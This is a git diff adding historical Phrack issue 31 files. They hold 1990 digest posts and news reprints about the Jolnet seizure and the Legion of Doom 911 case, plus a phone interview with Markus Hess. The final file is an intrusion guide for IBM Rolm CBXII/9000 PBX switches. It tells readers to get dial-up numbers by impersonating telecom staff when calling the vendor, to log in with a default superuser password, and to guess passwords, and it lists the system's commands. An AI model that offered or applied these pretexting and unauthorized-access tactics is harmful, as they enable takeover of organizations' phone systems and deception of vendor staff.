+                ---------------------------------------
+          Article from "A Networker's Journal" by Charles Bowen.
+                    Info-Mat Magazine (Vol. 6, No. 2)
+[Moderator's Note: {Info-Mat Magazine}, by the way, is the excellent
+electronic journal distributed on many BBS machines throughout the
+United States who are fortunate enough to be accepted as part of the
+magazine's distribution network.  I personally wish it was distributed
+on Usenet as well: it is well written and very informative.   PT]
+------------------------------
+Date: Sat, 3 Mar 90 19:34:54 CST
+From: TELECOM Moderator <telecom@eecs.nwu.edu>
+Subject: A Conversation With Rich Andrews
+After the first articles appeared here relating to the seizure of
+Jolnet, and the indictment of some people for their part in the theft
+of '911 software', I got various messages from other folks in
+response. Some were published, while others were just personal
+correspondence to me. One from Chip Rosenthal was held over, and is
+included in this special issue today.
+One writer, whose comments were attributed to 'Deep Throat' spent some
+time on two occassions on the phone, in a conference call between
+himself, David Tamkin and myself.
+What was lacking in the several messages which appeared over the past
+week were comments from Rich Andrews, system administrator of Jolnet.
+I got one note from someone in Canada who said Andrews wanted to speak
+with me, and giving a phone number where I could call Andrews at his
+place of employment.
+I put in a call there, with David Tamkin on the other line and had a
+long discussion with Andrews, who was aware of David being on the line
+with me.  I asked Andrews if he had any sort of net access available
+to him at all -- even a terminal and modem, plus an account on some
+site which could forward his mail to telecom. You see, I thought, and
+still think it is extremely important to include Rich Andrews in any
+discussion here.
+He assured me he did have an account on a Chicago area machine, and
+that a reply would be forthcoming within hours. I had a second
+conversation with him the next morning, but without David on the line.
+He again told me he would have a response to the several articles
+written in the Digest ready and in the email 'very soon'.  This was on
+Wednesday morning, and we estimated his message would be here sometime
+later in the day -- certainly by midnight or so, when I am typically
+working up an issue of the Digest.
+Midnight came and went with no message. None showed up Thursday or
+Friday.  I deliberatly withheld saying anything further in the hopes
+his reply would be here to include at the same time. I guess at this
+point we have to go on without him.
+When David Tamkin and I talked to him the first time, on Tuesday
+evening this past week, the first thing Andrews said to us, after the
+usual opening greetings and chitchat was,
+ "I've been cooperating with them for over a year now. I assume you
+know that."
+We asked him to define 'them'.  His response was that 'them' was the
+United States Secret Service, and the Federal Bureau of Investigation.
+He said this without us even asking him if he was doing so.
+We asked him to tell us about the raid on his home early in February.
+He said the agents showed up that Saturday afternoon with a warrant,
+and took everything away as 'evidence' to be used in a criminal
+prosecution.
+ME> "If you have been working and cooperating with them for this long,
+why did they take your stuff?"
+RA> "They wanted to be sure it would be safe, and that nothing would be
+destroyed."
+ME> "But if you wanted to simply keep files safe, you could have taken
+Jolnet off line for a few weeks/months by unplugging the modems from
+the phone jacks, no? Then, plugged in a line when you wanted to call
+or have a trusted person call you."
+RA> "They thought it was better to take it all with them. It was mostly
+for appearance sake. They are not charging me with anything."
+ME> "Seems like a funny way to treat a cooperative citizen, at least
+one who is not in some deep mess himself."
+He admitted to us that several crackers had accounts on Jolnet, with
+his knowledge and consent, and that it was all part of the investigation
+going on ... the investigation he was cooperating in.
+Here is how he told the tale of the '911 software':
+The software showed up on his system one day, almost two years ago. It
+came to him from netsys, where Len Rose was the sysadmin. According to
+Andrews, when he saw this file, and realized what it was, he knew the
+thing to do was to 'get it to the proper authorities as soon as
+possible', so he chose to do that by transferring it to the machine
+then known as killer, a/k/a attctc, where Charlie Boykin was the
+sysadmin.
+Andrews said he sent it to Boykin with a request that Boykin pass it
+along to the proper people at AT&T.
+ME> "After you passed it along to Boykin, did you then destroy the
+file and get it off your site?"
+RA> "Well, no... I kept a copy also."
+ME> "Did Charlie Boykin pass it along to AT&T as you had requested?"
+RA> "I assume he did."
+But then, said Andrews, a funny thing happened several months later.
+The folks at AT&T, instead of being grateful for the return of their
+software came back to Andrews to (in his words) 'ask for it again.'
+Somehow, they either never got it the first time; got it but suspected
+there were still copies of it out; or were just plain confused.
+So he was contacted by the feds about a year ago, and it was at that
+point he decided it was in his best interest to cooperate with any
+investigation going on.
+Andrews pointed out that the '911 software' was really just ".... a
+small part of what this is all about..."  He said there was other
+proprietary information going around that should not be circulating.
+He said also the feds were particularly concerned by the large number
+of break-ins on computers which had occurred in the past year or so.
+He said there have been literally "....thousands of attempts to break
+into sites in the past year....", and part of his cooperation with the
+authorities at this time dealt with information on that part of it.
+We asked him about killer/attctc:
+ME> "You knew of course that killer went off line very abruptly about
+a week ago. What caused that? It happened a week or so after the feds
+raided you that Saturday."
+RA> "Well the official reason given by AT&T was lack of funds, but you
+know how that goes...."
+Now you'd think, wouldn't you, that if it was a funding problem -- if
+you can imagine AT&T not having the loose change in its corporate
+pocket it took to provide electrical power and phone lines to attctc
+(Charlie got no salary for running it) -- that at least an orderly
+transition would have taken place; i.e. an announcement to the net; an
+opportunity to distribute new maps for mail and news distribution,
+etc; and some forthcoming shut down date -- let's say March 1, or
+April 1, or the end of the fiscal year, or something....
+But oh, no...  crash boom, one day it is up, the next day it is gone.
+ME> "What do you know about the temporary suspension of killer some
+time ago? What was that all about?"
+RA> "It was a security thing. AT&T Security was investigating Charlie
+and some of the users then."
+Andrews referred to the previous shutdown of killer as 'a real blunder
+by AT&T', but it is unclear to me why he feels that way.
+We concluded our conversation by Andrews noting that "there is a lot
+happening out there right now."
+He said the [Phrack] magazine distribution, via netsys, attctc and
+jolnet was under close review. "One way to get them (crackers) is by
+shutting down the sites they use to distribute stuff..."
+And now, dear reader, you know everything I know on the subject. Well,
+almost everything, anyway....
+ From other sources we know that Len Rose of netsys was in deep
+trouble with the law *before* this latest scandal.  How deep? Like he
+was ready to leave the country and go to the other side of the world
+maybe?  Like he was in his car driving on the expressway when they
+pulled him over, stopped the car and placed him under arrest?  Deep
+enough? This latest thing simply compounded his legal problems.
+Patrick Townson
+------------------------------
+Date: Fri Mar  2 06:59:23 1990
+From: Charlie Boykin <cfb@sulaco.sigma.com>
+Subject: Killer/attctc Is Permanently Down
+Hello,
+    Regarding a couple of things as well as a message from Bill Huttig.
+    The system WAS shut down a couple of years ago - for three weeks -
+as part of a security inquiry. It has been in continous operation
+since. On July 4, 1989, it was moved to a Customer Demonstration
+location at the Dallas Infomart and the node name changed to attctc
+(for AT&T Customer Technology Center). The system was closed down on
+February 20, 1990 after 5 years of operation. There are no charges
+pending and the "management" of the system have been ostensibly
+cleared of any illegal activities.
+   As of now, there are no intentions of returning the system to
+service.  There are hopeful plans and proposals that could conceivably
+result in the system being placed back in service in a different
+environment and under different management.
+                                        Respectfully,
+                                        Charles F. Boykin
+                                        Formerly sysop\@attctc (killer)
+------------------------------
+End of TELECOM Digest Special: Jolnet, Again
+******************************
+---------------
+[reprinted without permission from the Feb. 12th, 1990 issue of Telephony]
+ALLEGED HACKERS CHARGED WITH THEFT OF 911 DATA
+Dawn Bushaus, Assistant Editor
+     Four alleged computer hackers were indicted last week on charges that they
+schemed to steal and publish proprietary BellSouth Corp. emergency data.  The
+alleged activity could have produced disruptions in 911 networks nationwide,
+according to federal officials.
+     The case could raise new concerns about the security of local exchange
+carriers' internal computer networks, which house data records on customers,
+equipment and operations.
+     "Security has always been a concern for the telephone companies," said
+Peter Bernstein, an analyst with Probe Research.  "If you can crack the 911
+system, what does that say about the operational support system or the billing
+system?"
+     A federal grand jury in Chicago handed down two indictments charging
+[The Prophet], 20, of Decatur, Ga., and [Knight Lightning], 19, of
+Chesterfield, Mo., with wire fraud, violations of the 1986 Computer Fraud Act
+and interstate transportation of stolen property.
+     Facing similar criminal charges in Atlanta are [The Urvile], 22, and
+[The Leftist], 23.
+     The four, alleged to be part of a closely knit group of hackers calling
+themselves the Legion of Doom, reportedly participated in a scheme to steal the
+BellSouth 911 data, valued at $80,000, and publish it in a hacker magazine
+known as "Phrack."
+     The Legion of Doom reportedly is known for entering telephone companies'
+central office switches to reroute calls, stealing computer data and giving
+information about accessing computers to fellow hackers.
+     According to the Chicago indictment, XXXXX, also known as "The Prophet,"
+stole a copy of the BellSouth 911 program by using a computer outside the
+company to tap into the BellSouth computer.  Riggs then allegedly transferred
+the data to a computer bulletin board in Lockport, Ill.
+     XXXXXXX, also known as "Knight Lightning," reportedly downloaded the
+information into his computer at the University of Missouri, Columbia, where he
+edited it for publication in the hacker magazine, the indictment said.
+     The indictment also charges that the hackers disclosed the stolen
+information about the operation of the enhanced 911 system to other hackers so
+that they could illegally access the system and potentially disrupt or halt
+other systems across the country.
+     The indictments followed a year-long investigation, according to U.S.
+Attorney Ira Raphaelson.  If convicted, the alleged hackers face 31 to 32 years
+in prison and $122,000 in fines.
+     A BellSouth spokesman said the company's security system discovered the
+intrusion, which occurred about a year ago, and the company then notified
+federal authorities.
+     Hacker invasion in the BellSouth network is very rare, the spokesman said,
+adding that the company favors "stringent laws on the matter."
+     The indictment solicited concern about the vulnerability of the public
+network to computer hacking.
+----------------
+From: MM02885@swtexas.bitnet
+Newsgroups: comp.dcom.telecom
+Subject: Re: Hacker Group Accused of Scheme Against BellSouth
+Message-ID: <4153@accuvax.nwu.edu>
+Date: 20 Feb 90 11:16:00 GMT
+Sender: news@accuvax.nwu.edu
+Organization: TELECOM Digest
+Lines: 95
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 118, message 3 of 6
+               <<< SYS$ANCILLARY:[NOTES$LIBRARY]GENERAL.NOTE;1 >>>
+                            -< General Discussion >-
+==============================================================================
+Note 155.6                 the MENTOR of the tree tops                  6 of 6
+SWT::RR02026 "Ray Renteria [ F L A T L I N E ] "   89 lines  20-FEB-1990 00:18
+                         -< Life, The Universe, & LOD >-
+To set the record straight, a member of LOD who is a student in Austin
+and who has had his computer account at UT subpoenaed by the DA out of
+Chicago because of dealings with the above happenings:
+My name is Chris, but to the computer world, I am Erik Bloodaxe.  I
+have been a member of the group known as Legion of Doom since its
+creation, and admittedly I have not been the most legitimate computer
+user around, but when people start hinting at my supposed
+Communist-backed actions, and say that I am involved in a world-wide
+consipracy to destroy the nations computer and/or 911 network, I have
+to speak up and hope that people will take what I have to say
+seriously.
+Frank, Rob and Adam were all definately into really hairy systems.
+They had basically total control of a packet-switched network owned by
+Southern Bell (SBDN)...through this network they had access to every
+computer Southern Bell owned...this ranging from COSMOS terminals up
+to LMOS front ends.  Southern Bell had not been smart enough to
+disallow connections from one public pad to another, thus allowing
+anyone who desired to do so, the ability to connect to, and seize
+information from anyone else who was using the network...thus they
+ended up with accounts and passwords to a great deal of systems.
+This was where the 911 system came into play.  I don't know if this
+system actually controlled the whole Southern Bell 911 network, or if
+it was just a site where the software was being developed, as I was
+never on it.  In any case, one of the trio ended up pulling files off
+of it for them to look at.  This is usually standard proceedure: you
+get on a system, look around for interesting text, buffer it, and
+maybe print it out for posterity.  No member of LOD has ever (to my
+knowledge) broken into another system and used any information gained
+from it for personal gain of any kind...with the exception of maybe a
+big boost in his reputation around the underground.  Rob took the
+documentation to the system and wrote a file about it.  There are
+actually two files, one is an overview, the other is a glossary.  (Ray
+has the issue of PHRACK that has the files) The information is hardly
+something anyone could possibly gain anything from except knowledge
+about how a certain aspect of the telephone company works.
+The Legion of Doom used to publish an electronic magazine called the
+LOD Technical Journal.  This publication was kind of abandoned due to
+laziness on our part.  PHRACK was another publication of this sort,
+sent to several hundred people over the Internet, and distributed
+widely on bulletin boards around the US.  Rob sent the files to PHRACK
+for the information to be read.  One of PHRACK's editors, Craig,
+happened to be the one who received the files.  If Rob had sent the
+files to one address higher, Randy would have been the one who would
+probably be in trouble.  In anycase, Craig, although he may have
+suspected, really had no way to know that the files were propriatary
+information and were stolen from a Southern Bell computer.
+The three Atlanta people were busted after having voice and data taps
+on their lines for 6 months.  The Phrack people were not busted, only
+questioned, and Craig was indicted later.
+What I don't understand is why Rob and Craig are singled out more
+often than any other people.  Both of them were on probation for other
+incidents and will probably end up in jail due to probation violations
+now.  Frank and Adam still don't know what is going on with their
+cases, as of the last time I spoke with them.
+The whole bust stemmed from another person being raided and rolling
+over on the biggest names he could think of to lighten his burden.
+Since that time, Mr. William Cook, the DA in Chicago, has made it his
+life's goal to rid the world of the scourge of LOD.  The three Atlanta
+busts, two more LOD busts in New York, and now, my Subpoena.
+People just can't seem to grasp the fact that a group of 20 year old
+kids just might know a little more than they do, and rather than make
+good use of us, they would rather just lock us away and keep on
+letting things pass by them.  I've said this before, you cant stop
+burglars from robbing you when you leave the doors unlocked and merely
+bash them in the head with baseball bats when they walk in.  You need
+to lock the door.  But when you leave the doors open, but lock up the
+people who can close them for you another burglar will just walk right
+in.
+If anyone really wants to know anything about what is going on or just
+wants to offer any opinions about all this directly to me, I'm
+erikb@walt.cc.utexas.edu
+but my account is being monitored so don't ask anything too explicit.
+->ME
+-----------
+Well, as some of you may already know, the people that put out Phrack were
+busted recently.  Up until now, details were scarce, but things are starting to
+appear in the news.
+[reprinted without permission from the Milwaukee Journal Wed. Feb. 7th]
+        Chicago, Ill. - AP - A computer hacker broke into the 911 emergency
+telephone network covering nine states in the South and another intruder passed
+on the access data to other hackers, authorities said.
+        [The Prophet], 20, of Decatur, GA., and [Knight Lightning],
+19, of Chesterfield, MO., were indicted Tuesday by
+a federal grand jury and accused of computer crimes, said acting US Atty. Ira
+H. Raphaelson.
+        He said Riggs was a member of the so-called Legion of Doom hackers
+group, whose members are involved in numerous illegal activities.
+        Riggs and two other alleged members also were indicted in Atlanta and
+charged in other computer break-ins.
+        The government would not say if any emergency calls were disrupted or
+whether other damage was done during the tampering.
+------------
+Name: The Prophet #104
+Date: Tue Feb 06 23:55:15 1990
+Imagine that you're deaf, dumb, blind, and paralyzed from the neck down and
+totally unable to experience or communicate with the outside world.  How long
+could you retain your sanity?  How many of you would choose to die instead?
+How many of you think you could muster the willpower to create your own little
+mental world to live in for the rest of your life, and how long do you think
+the hospital would wait before putting you out of your misery?
+  -The Prophet
+------------
+Name: The Mentor #1
+Date: Sat Jan 20 02:58:54 1990
+Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know
+that the phrack accounts at U of M have been shut down. The story is as
+follows...
+Government agents (not sure of the dept., probably SS) have apparently been
+monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for
+some time now. Apparently, a portion of a file sent to them (and subsequently
+published) contained copyrighted information. This is all they needed. They
+have now seized the entire Phrack net mailing list (over 500 accounts), plust
+every piece of information that Randy & Craig have (and they have a *LOT*) on
+real names, addresses and phone numbers.
+This is evolving directly out of the busts of three LOD members (Urvile,
+Leftist & Prophet). The Prophet (who is on probation) is apparently being
+threatened with a prison term if he doesn't cooperate. We don't know for sure
+if he cooperated or not, but what would you do in the same position?
+The same officials are apparently *VERY* interested in our co-sys, Mr.
+Bloodaxe. His net account is being watched, etc. I'll let him tell the story.
+board only. I will be adding a secure (and I mean fucking secure) encryption
+routine into the e-mail in the next 2 weeks - I haven't decided exactly how to
+implement it, but it'll let two people exchange mail encrypted by a password
+only know to the two of them. Hmmmm... carry this conversation to the
+programming board.
+Anyway, I do not think I am due to be busted, but then again, I don't do
+anything but run a board. Still, there is that possibility. I assume that my
+lines are all tapped until proven otherwise.
+There is some question to the wisdom of leaving the board up at all, but I hae
+(have) personally phoned several government investigators and invited them to
+join us here on the board. If I begin to feel that the board is putting me in
+any kind of danger, I'll pull it down with no notice - I hope everyone
+understands.
+It looks like it's sweeps-time again for the feds. Let's hope all of us are
+still around in 6 months to talk about it.
+The Mentor
+Legion of Doom!
+[Phoenix Project has been down for some time now.]
+---------------
+Newsgroups: comp.dcom.telecom
+Subject: The Purpose and Intent of the Legion of Doom
+Message-ID: <4248@accuvax.nwu.edu>
+From: anytown!legion@cs.utexas.edu (Legion of Doom)
+Date: 22 Feb 90 04:42:04 GMT
+Sender: news@accuvax.nwu.edu
+Organization: Anytown USA
+Approved: Telecom@eecs.nwu.edu
+X-Submissions-To: telecom@eecs.nwu.edu
+X-Administrivia-To: telecom-request@eecs.nwu.edu
+X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5
+Lines: 51
+[Moderator's Note: This anonymous message came in the mail today.  PT]
+Well, I had to speak up. There has been a lot of frothing (mostly by
+people who believe everything that they read in the paper) about
+Legion of Doom. I have been involved in the group since 1987, and
+dislike seeing irresponsible press concerning our "plot to crash 911"
+or our "links to organized crime."
+LOD was formed to bring together the best minds from the computer
+underground - not to do any damage or for personal profit, but to
+share experiences and discuss computing. The group has *always*
+maintained the highest ethical standards of hacker (or "cracker," as
+you prefer) ethics.  On many occasions, we have acted to prevent abuse
+of systems that were *dangerous* to be out - from government systems
+to Easter Seals systems.  I have known the people involved in this 911
+case for many years, and there was *absolutely* no intent to interfere
+with or molest the 911 system in any manner. While we have
+occasionally entered a computer that we weren't supposed to be in, it
+is grounds for expulsion from the group and social ostracism to do any
+damage to a system or to attempt to commit fraud for personal profit.
+The biggest crime that has been committed is that of curiosity. Kim,
+your 911 system is safe (from us, at least). We have been instrumental
+in closing many security holes in the past, and had hoped to continue
+to do so in the future. The list of computer security people who count
+us as allies is long, but must remain anonymous. If any of them choose
+to identify themselves, we would appreciate the support.
+I am among the people who no longer count themselves as "active"
+members of the group. I have been "retired" for well over a year. But
+I continue to talk to active members daily, and support the group
+through this network feed, which is mail-routed to other LODers, both
+active and accessible.
+Anyone who has any questions is welcome to mail us - you'll find us
+friendly, although a bit wary. We will also be glad to talk voice with
+anyone if they wish to arrange a time to call.  In spite of all the
+media garbage, we consider ourselves an ethical, positive force in
+computing and computer security. We hope others will as well.
+The Mentor/Legion of Doom
+legion%anytown.uucp@cs.utexas.edu
+[Moderator's Note: As an 'ethical, positive force in computing', why
+can't you sign your name to messages such as the above?  Usually I
+don't even consider anonymous messages for publication in the Digest;
+but your organization has a perfect right to tell your side of the
+story, and I am derelict if I don't print it. Real names and
+addresses go a long way toward closing credibility gaps here.  PT]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+     There you go.  It's over now, forget it and move on.  Nothing more to
+report on the subject that hasn't been printed, typed, spoken, or heard in the
+last couple of months.
+
+_______________________________________________________________________________
+Phrack 31 -  .end
+
+
+
diff --git a/phrack31/2.txt b/phrack31/2.txt
new file mode 100644
index 0000000..73c4e3f
--- /dev/null
+++ b/phrack31/2.txt
@@ -0,0 +1,160 @@
+                                ==Phrack Inc.==
+                Volume Three, Issue Thirty-one, Phile #2 of 10
+                -*[  P H R A C K  # 3 1   P R O P H I L E  ]*-
+                            -*[  June 1, 1990  ]*-
+                               -*[Phz]*-
+---[ Markus Hess ]---
+   Recently the Phrack editors had the opportunity to talk to Markus Hess in
+his tiny Hannover flat.  This special edition of the Phrack Prophile details
+our conversation, as well as general background information about the German
+Hacker.
+   This Phrack Prophile is not in the same format as previous ones because of
+the nature of the profile. In the next issue, we will reform back to the
+orginal creator's format.
+            AGE: 26
+         HEIGHT: 5' 10"
+     HAIR COLOR: BROWN
+           EYES: BROWN
+           FROM: Hannover, West Germany
+PAST EMPLOYMENT: Software developer in Hannover.
+         PEOPLE: Stephen Winero, Walu Holland (Other CCC members)
+      STRENGTHS: AT&T Unix, VAX, SunOs and BSD os's
+
+   Hess, most well known as the hacker who's exploits are detailed in
+Clifford Stoll's _The_Cuckoo's_Egg_, "is as paranoid on the telephone as he
+is on the computer."  Although he was very reluctant to talk to us, we did
+manage to talk to him about hacking and _The_Cuckoo's_Egg_.
+Ringing Hanover..
+RING
+RING
+RING
+ANSWERED
+HESS: Hallo?
+PHRACK: Is this Markus Hess?
+HESS: Yes.
+PHRACK: Do you smoke Benson & Hedges?
+         (At this point we weren't sure it was actually him)
+HESS: Yes, who is this?
+PHRACK: We are calling from the USA, we want to ask you some questions.
+        We talk to hackers in the USA.
+HESS: I won't have anything to do with hackers anymore.  I have talked in
+      court earlier this year.
+PHRACK: Did you know you were in a novel about a hacker in the US?
+HESS: Novel? Yes, I know of a novel.
+PHRACK: Have you read the book?
+HESS: Yes I have read the book.
+PHRACK: Is it all true?  Is it all true?  Do you think Cliff lied or tried
+        to exaggerate in the book?
+HESS: Yes, I think so.
+HESS: Yes, He lied.
+PHRACK: Have you ever talked to Stoll?
+HESS: I have talked to him, but not privately.  I don't want to talk about
+      this.
+PHRACK: Have you ever seen Cliff Stoll?
+HESS: Yes I have seen him.
+      (We might think this from the back of the book)
+PHRACK: He's goofy looking isn't he?
+HESS: goofy? I don't understand.
+PHRACK: Anyway, so you think he lied in the book?
+HESS: Yes, he lied.
+PHRACK: What did he lie about?
+HESS: I don't want to talk about this.
+PHRACK: Okay, are you in the Chaos Computer Club?
+HESS: No, I won't have anything to do with hackers any more.
+PHRACK: Were you ever involved with them?
+HESS: No.  I was not in it.
+PHRACK: Do you know anyone in it [the CCC]?
+HESS: Yes.  I really must go now.
+PHRACK: Who do you know in it [the CCC]?
+HESS: Stephen Winero.
+PHRACK: Is that it?
+HESS: I know Walu.
+PHRACK: Hmm.  Are you being watched?
+HESS: I think so.  I can not talk about this.
+PHRACK: Were you scared of going to jail?
+HESS: jail?
+PHRACK: Prison, were you scared of going to prison?
+HESS: I don't know.
+PHRACK: What happened in your words at court?
+HESS: In your words? I don't understand.
+PHRACK: What happened in court?
+HESS: I don't understand.
+PHRACK: Forget it.
+PHRACK: Do you still have your computer?
+HESS: No. I don't have any computer here.
+PHRACK: Did you think they were going to catch you?
+HESS: No.  I knew nothing of it.
+PHRACK: Has any other hackers tried to contact you in the U.S.?
+HESS: No. You are the first to call.
+PHRACK: So is it my understanding that Stoll lied in parts of the book?
+HESS: Lied?  Yes he lied.
+PHRACK: Why do you think he would lie?
+HESS: I don't know.
+PHRACK: Do you think he made you look destructive?
+HESS: Yes.  He made me look mean.
+PHRACK: Are you? Mean that is?
+        (Chuckle)
+HESS: No.  He made me look like I was a criminal.
+PHRACK: Why did you do it Markus?
+HESS: Do what?
+PHRACK: Hack all over the network like that?
+HESS: I cannot answer.
+PHRACK: Do they call you a liar in court?
+HESS: Yes.  They call me a liar.
+PHRACK: What are you going to do now?
+HESS: I don't understand.
+PHRACK: Are you finished with hacking?
+HESS: Yes, I have nothing to do with hackers.
+PHRACK: Was someone helping you hack?
+HESS: I cannot answer.
+PHRACK: How come you cannot answer that question?
+HESS: I cannot.
+PHRACK: Yes, well, Many in the U.S. [hackers] don't like the Novel.
+PHRACK: What do you think of it?
+HESS: It is not true.
+HESS: I don't know.
+PHRACK: Who taught you the EMACS hole?
+HESS: I cannot say.
+PHRACK: Then you must have been working with someone, correct?
+HESS: No, I cannot answer.
+PHRACK: Is the police comming down on you hard?
+HESS: police? I don't und...
+PHRACK: Yeah, yeah.  The law? Are they being hard on you.
+HESS: Yes.
+<SILENCE>
+HESS: I must go now.
+PHRACK: Can we call you later?
+HESS: Umm, I don't know. No.
+PHRACK: Why not?
+HESS: I cannot answer.
+PHRACK: What about in a couple of months?
+HESS: Yes, in a couple of months you can call.
+PHRACK: Your not moving are you?
+        (Knowing that Germans rarely ever move and their phone
+         numbers never change this was a silly Q.)
+HESS: No. I no move.
+PHRACK: Okay, then we'll call you in a couple of months.
+HESS: Okay. I must go.
+PHRACK: Wait a second.
+HESS: Yes?
+PHRACK: Do you have anything to say to American Hackers?
+HESS: No.
+HESS: I have nothing to do with hackers.
+PHRACK: Well, good luck.
+HESS: Yes, you too.
+<CLICK>
+
+   Unfortunately, our lack of German and Hess' weak English made
+communication difficult.  He is a very paranoid person who was obviously
+uncomfortable talking to us.
+   Those of you that have read Stoll's book know that Hess was involved
+with hacks on American Military Computers, and indirectly involved with
+Computer Espionage and the KGB.  Phrack strongly discourages trying to
+hack Military computers and particularly takes offense to computer
+espionage.
+   From the information we have gathered from him and by talking to him,
+we feel that Markus Hess wasn't as smart as Clifford Stoll portrayed him to be.
+We also feel that Markus was not working alone and that others were involved.
+This however we cannot be 100% sure because of our communication faults.
+
+_______________________________________________________________________________
diff --git a/phrack31/3.txt b/phrack31/3.txt
new file mode 100644
index 0000000..c020dfd
--- /dev/null
+++ b/phrack31/3.txt
@@ -0,0 +1,279 @@
+                             ===Phrack Inc.===
+               Volume Three, Issue Thirty-one, Phile #3 of 10
+              /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
+             / *                                            * \
+             \                                                /
+             /           Hacking Rolm's CBXII/9000            \
+             \                by DH                  /
+             /                   05/24/90                     \
+             \ *                                            * /
+              \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
+
+Introduction
+------------
+     IBM Rolm's CBXII/9000 is a very powerful machine.  Powerful in the aspect
+that one has the switch(s) at his control.  Controling switches means you can
+control the entire PBX environment (And it's users).
+     This file will not get technical.  Basically, I'm writing this file on
+the HOW-TO's of the internal works of CBXII and the basics of obtaining the
+dialups and account information need to access the machines.  For further
+information on CBX's in general, read Epsilon's Phrack Phile on them, or
+consult Evil Jay's phile on OSL's.
+
+Obtaining Dialups
+--------- -------
+      Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
+(Yes, even harder than hacking them).  There are several ways to obtain the
+dialups.  I would say a good bit of CBX's are at universities and hospitals
+where they own their own switches.  Most of the time you can determine if they
+have one by calling the Telecommunications Department of the target location.
+Or, another way is to check with ROLM.  If you *KNOW* that a target location
+has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
+Telecommunications Department and your looking for the DIALUP.  Rolm has files
+on all their CBXxx's and the Dialups also.  They might ask you for a NODE #
+for the dialup, and you should usually respond with what node you want (Since
+different nodes handle different areas of the PBX).  Basically, nodes start at
+ONE and usually goto THREE or FOUR, depending on the size of the PBX.
+       CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
+is a highly used and common voice mail system).  This of course doesn't mean
+that every PHM (Phone-Mail) system has a CBXxx attached.  But it is generally
+a good start.
+       The following is a checklist to determine if the target location could
+have a CBXxx for controlling their switch.  By no means however, if your target
+location has all of the following it could have a CBXxx.
+        1) Does the location handle it's own switch?
+            If so, what kind, and who services it.
+        2) Does IBM Rolm handle any aspect of their telecommunications
+           department?
+            If so, this is a possible CBXxx location.
+        3) Does the location have Rolm Phone-Mail?
+        These three guidelines are not requirements.  I.E. -- The location
+could have a non-IBM PBX but still have a CBXxx for handling the switch.
+So who knows.. It's up to you and your bullshitting and scans.
+Hacking the CBXxx's
+------- --- -------
+        Well, once you have obtained the dial-ups, you are almost halfway
+there.  Hacking the CBX is the easy part.  1st off, IBM Rolm ships *ALL*
+of their machines with a default account (Yes, and they never change it).
+When the destination of the CBX recieves the machine, they use the default
+to create other accounts for employees, PBX operators, and administration.
+Rolm IBM also has a field support account embedded in the machine.  These
+are different to each location and correspond to the serial number of the
+machine (Rolm's accounts can be obtained from Rolm's 800 technical support
+line).  So, now that we know that there is a default account that telecom
+department uses to setup the other accounts after they recieve the machine,
+tells us that this is a priviledge account.  And it is.
+         USERNAME: SU
+         PASSWORD: SUPER
+        How nice for them to give us such power.  Yes, it's a basic default
+with SuperUser priviledge.  If for some reason the account default has been
+changed, their are other ways of getting in:
+         1) Call Rolm and get the Field account information.
+         2) Try first names of Telecom Dept. employees, and PBX Operators.
+         3) Use every Hacking skills you have (If any).
+        Some older versions of CBX don't even require logging in with an
+account.  Those versions are less responsive to the administrators needs,
+but can be useful to one also.  Don't be discouraged if the SU password is
+changed, just call Rolm and get the field account.
+        The following is the matrix before one access the machine. *Note that
+it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
+CONNECT                                ID banner
+                 _Release version #  /
+                /                   /\
+Rolm CBXII  RELEASE 9004.0.65 RB74UCLA11956
+BIND DATE: 8/SEP/88                 \
+YOU HAVE ENTERED NODE 1, CPU 2       \_Name of owner, IE: UCLA
+11:14:30 ON FRIDAY 2/11/1990             (System ID)
+USERNAME: xxx
+PASSWORD: xxx
+INVALID USERNAME-PASSWORD PAIR.
+
+Once your in
+---- ---- --
+         Once your in, you should have no problems wondering around the
+machine and using the utilities in the machine's operating system.  There is
+very specific help functions inside the machine that will guide you through
+with no problems.  At the CBX prompt:
+%. HELP ?
+or
+%. ?
+          Should produce a valid listing of options and sub-functions.  Every
+function can be followed with a '?' to give lists of valid sub-functions under
+that function or how the syntax of that function should be used.
+          The following is a listing of commands for CBXII/9000:
+ABORT              ACTIVATE            ATTR                BYE
+CANCEL             CARD                CDRSM               CDT
+CHANGE             CHG                 CLEAR               CLR
+CMPCT              CMSTS               CNCL                CNFG
+CONVERT            COPY                CPEG                CTMON
+CTRA               CTRTL               CXCLR               COPY
+CXCLR              CXCON               CXNET               DACK
+DADD               DAEVT               DANS                DBDMP
+DCAT               DCF                 DCOM                DDMA
+DDQ                DDT                 DE                  DEACTIVATE
+DEFINE             DELETE              DEMOUNT             DESUM
+DEX                DFACK               DFCOM               DFEAT
+DFEVT              DHTQ                DHWS                DIAG
+DIQ                DISABLE             DIWQ                DKQ
+DML                DMNT                DMS                 DMTST
+DOWN               DPATR               DPMR                DPMS
+DPPRI              DPTR                DQQ                 DRCT
+DREGS              DSBLE               DSQ                 DSST
+DSTAK              DTCB                DTDQ                DWQ
+DX_TR              ENABLE              ENB                 ENBLE
+ETIO               EX                  EXM                 EXN
+EXP                EXPAND              FINIT               FORMAT
+FREER              FSD                 GTOD                HDBST
+HELP               INSTALL             KPFA                LCT
+LIST               LOAD                LOGOFF              LOGON
+LPEG               LPKT                LSCT                LSL
+LST                LTCB                MNT                 MONITOR
+MOUNT              MTRACE              NEXT                NSTAT
+PAGE               PCNFG               PDIO                PFA
+PKTS               PLIST               PLTT                PPFA
+PS                 PSH                 QAT                 QITM
+QTEST              RCT                 RECEIVE             RENAME
+REPLY              RESTART             RESTORE             REVERSE
+RM                 RMOFF               RPFA                RSC
+RSCLK              RSTOR               RSTRT               SAT
+SCAN               SEND                SET                 SHOW
+SITM               SOCON               SOUNC               SSAT
+START              STATE               STATUS              STEST
+STOD               STOP                STRT                STS
+TDCD               TEST                TKSTS               TRTL
+TST                TX                  UNLK                UNLOCK
